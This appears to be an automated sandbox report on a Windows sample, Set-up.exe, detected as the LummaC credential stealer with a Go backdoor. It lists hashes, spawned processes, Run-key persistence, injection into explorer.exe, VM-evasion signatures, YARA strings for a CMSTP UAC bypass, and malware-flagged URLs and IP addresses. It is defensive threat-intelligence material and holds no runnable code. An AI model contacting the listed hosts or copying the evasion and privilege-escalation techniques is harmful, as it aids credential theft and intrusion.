Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1635524
MD5: 0665eccf53dbdefae8c6789962993a70
SHA1: 3d1c966a7359856ee1532aaeec02b1f77b2f160d
SHA256: 3060fb37f6a35e6c8f5593e09752d8090d0127f5339c2c38360c549f765cba0f
Tags: exe, LummaStealer, user-aachum

Detection

GO Backdoor, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected GO Backdoor
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 0665ECCF53DBDEFAE8C6789962993A70)
    • K07BOQJSAWQXKEH8FTYNN.exe (PID: 6964 cmdline: "C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
    • Server.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe" MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
      • more.com (PID: 1444 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
        • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • explorer.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • Server.exe (PID: 5860 cmdline: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
    • more.com (PID: 8024 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 1684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Server.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe" MD5: A5EE3594A2A4697E0D71A1C3E622BD1F)
  • rareTemp.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Local\Temp\rareTemp.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
  • rareTemp.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Local\Temp\rareTemp.exe" MD5: E09C2CF3B8FCB1AA86C7A83AB5A04C49)
No configs have been found
Yara matches in process memory (Source | Rule | Description | Author):
Source: 00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000F.00000002.2461023555.000000000B272000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000010.00000002.2482357823.00000000001F0000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000C.00000002.2396557109.000000000B3C1000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
(10 entries in total; first 5 shown)
Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):
Source: 18.2.explorer.exe.50a9b57.5.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 18.2.explorer.exe.50a9b57.5.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen | Strings:
  • 0x1de27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1e0b3:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1deb2:$s1: CoGetObject
  • 0x1e13e:$s1: CoGetObject
  • 0x1de0b:$s2: Elevation:Administrator!new:
  • 0x1e097:$s2: Elevation:Administrator!new:
Source: 18.2.explorer.exe.50aa757.3.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 18.2.explorer.exe.50aa757.3.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen | Strings:
  • 0x1d227:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1d4b3:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x1d2b2:$s1: CoGetObject
  • 0x1d53e:$s1: CoGetObject
  • 0x1d20b:$s2: Elevation:Administrator!new:
  • 0x1d497:$s2: Elevation:Administrator!new:
Source: 15.2.Server.exe.b278901.23.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
(31 entries in total; first 5 shown)

System Summary

Sigma rule matches:
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\rareTemp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe, ProcessId: 6964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecAV
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\rareTemp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe, ProcessId: 6964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecAV

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T18:32:12.782307+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49721 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:16.193476+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49723 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:19.051406+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49724 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:22.350063+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49725 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:25.387590+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49726 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:28.638222+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:33.370107+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49728 | 104.21.72.2 | 443 | TCP
2025-03-11T18:32:36.540623+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 191.101.230.18 | 443 | TCP
2025-03-11T18:32:46.256739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.17.151.117 | 443 | TCP
2025-03-11T18:32:51.336881+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.18.36.145 | 443 | TCP

AV Detection

Source: https://peacefzulpillow.today/Kdzwefm | Avira URL Cloud: Label: malware
Source: https://peacefzulpillow.today/Kdzwe | Avira URL Cloud: Label: malware
Source: https://peacefzulpillow.today/z | Avira URL Cloud: Label: malware
Source: https://peacefzulpillow.today/Kdzw | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Local\Temp\ertyayyeqtcs | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\ertyayyeqtcs | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | ReversingLabs: Detection: 55%
Source: Set-up.exe | Virustotal: Detection: 33%
Source: Set-up.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability

Exploits

Source: Yara match | File source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2461023555.000000000B272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2482357823.00000000001F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2396557109.000000000B3C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2470851916.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2483054416.000000000445F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3676999259.000000000505E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2510066732.000000000B3CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: more.com PID: 8024, type: MEMORYSTR

Compliance

Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Unpacked PE file: 11.2.K07BOQJSAWQXKEH8FTYNN.exe.2930000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Unpacked PE file: 25.2.rareTemp.exe.2990000.2.unpack
Source: Set-up.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File opened: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 191.101.230.18:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.17.151.117:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.36.145:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Set-up.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamarshal\lib\win\release\32\dvamarshal.pdb source: Server.exe, 0000000C.00000002.2383590113.0000000000880000.00000002.00000001.01000000.0000000E.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450996101.0000000000C10000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_date_time\lib\win\release\32\boost_date_time.pdb source: Server.exe, 0000000C.00000002.2388499779.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452932471.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dynamiclink\dynamiclink\lib\win\release\32\dynamiclink.pdb source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_threads\lib\win\release\32\boost_threads.pdb source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2388668803.0000000001523000.00000002.00000001.01000000.0000001D.sdmp, Server.exe, 0000000F.00000002.2453076234.0000000001523000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdb source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp, Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbp source: Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdb source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPH,[G source: Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbP source: Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\MediaFoundation.pdb source: Server.exe, 0000000C.00000002.2388207711.00000000012B0000.00000002.00000001.01000000.00000016.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452454538.00000000012B0000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdb source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb` source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ImageRenderer.pdb source: Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2387210258.0000000001091000.00000002.00000001.01000000.00000012.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2451595701.0000000001091000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbPA source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPL source: Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\libm\md\libmmd.pdb source: Server.exe, 0000000C.00000002.2398521146.00000000101F1000.00000002.00000001.01000000.00000019.sdmp, Server.exe, 0000000F.00000002.2463471681.00000000101F1000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: msvcr100.i386.pdb source: Server.exe, 0000000C.00000002.2399201545.000000006D051000.00000020.00000001.01000000.00000010.sdmp, Server.exe, 0000000F.00000003.2423525477.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2463800741.000000006D0B1000.00000020.00000001.01000000.00000010.sdmp
                  Source: Binary string: msvcp100.i386.pdb source: Server.exe, 0000000C.00000002.2399662755.000000006D111000.00000020.00000001.01000000.0000000F.sdmp, Server.exe, 0000000F.00000002.2463953503.000000006D171000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdb source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdbP source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdb source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdb source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbP8 source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbpC(zB source: Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdb source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPQ source: Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb` source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLMessaging.pdb source: Server.exe, 0000000C.00000002.2388001008.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000002.2452288985.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp
